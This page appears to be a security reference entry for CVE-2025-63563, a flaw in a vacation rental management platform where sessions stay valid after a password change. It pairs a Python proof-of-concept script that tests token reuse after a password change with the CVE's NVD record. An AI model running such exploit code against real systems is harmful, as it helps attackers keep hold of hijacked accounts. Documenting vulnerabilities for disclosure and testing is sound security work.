CVE-2025-63563

# CVE-2025-63563 Session Fixation PoC import requests TARGET_URL = "https://vulnerable-server.com" VICTIM_USERNAME = "[email protected]" VICTIM_PASSWORD = "OldPassword123" NEW_PASSWORD = "NewPassword456" def exploit_session_fixation(): """ Session Fixation Attack Steps: 1. Attacker obtains a valid session token (e.g., via XSS or MITM) 2. Victim authenticates with the attacker's session token 3. Victim changes password 4. Attacker uses the same session token to access victim's account """ session = requests.Session() # Step 1: Attacker obtains a session token (simulated) init_response = session.get(f"{TARGET_URL}/login") attacker_session_token = session.cookies.get('SESSION_ID') print(f"[+] Attacker obtains session token: {attacker_session_token}") # Step 2: Victim authenticates with attacker's session token session.cookies.set('SESSION_ID', attacker_session_token) login_data = { 'username': VICTIM_USERNAME, 'password': VICTIM_PASSWORD } session.post(f"{TARGET_URL}/login", data=login_data) print("[+] Victim logged in with attacker's session token") # Step 3: Victim changes password change_pwd_data = { 'current_password': VICTIM_PASSWORD, 'new_password': NEW_PASSWORD } session.post(f"{TARGET_URL}/account/change-password", data=change_pwd_data) print("[+] Victim changed password") # Step 4: Attacker uses old session token to access account attacker_session = requests.Session() attacker_session.cookies.set('SESSION_ID', attacker_session_token) response = attacker_session.get(f"{TARGET_URL}/account/dashboard") if response.status_code == 200 and "account_data" in response.text: print("[+] VULNERABLE: Attacker still has access after password change!") return True else: print("[-] NOT VULNERABLE: Session was properly invalidated") return False if __name__ == "__main__": exploit_session_fixation()

{"cve": {"id": "CVE-2025-63563", "sourceIdentifier": "[email protected]", "published": "2025-10-31T21:15:44.713", "lastModified": "2025-11-05T19:10:38.197", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Summer Pearl Group Vacation Rental Management Platform prior to v1.0.2 does not properly invalidate active user sessions after a password change. This allows an attacker with a valid session token to maintain access to the account even after the legitimate user changes their password."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-286"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:summerpearlgroup:vacation_rental_management_platform:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.0.2", "matchCriteriaId": "E70289E7-BECA-463B-ABB1-0C46DBDF2057"}]}]}], "references": [{"url": "https://github.com/Stolichnayer/Summer-Pearl-Group-Insufficient-Session-Expiration", "source": "[email protected]", "tags": ["Product"]}]}}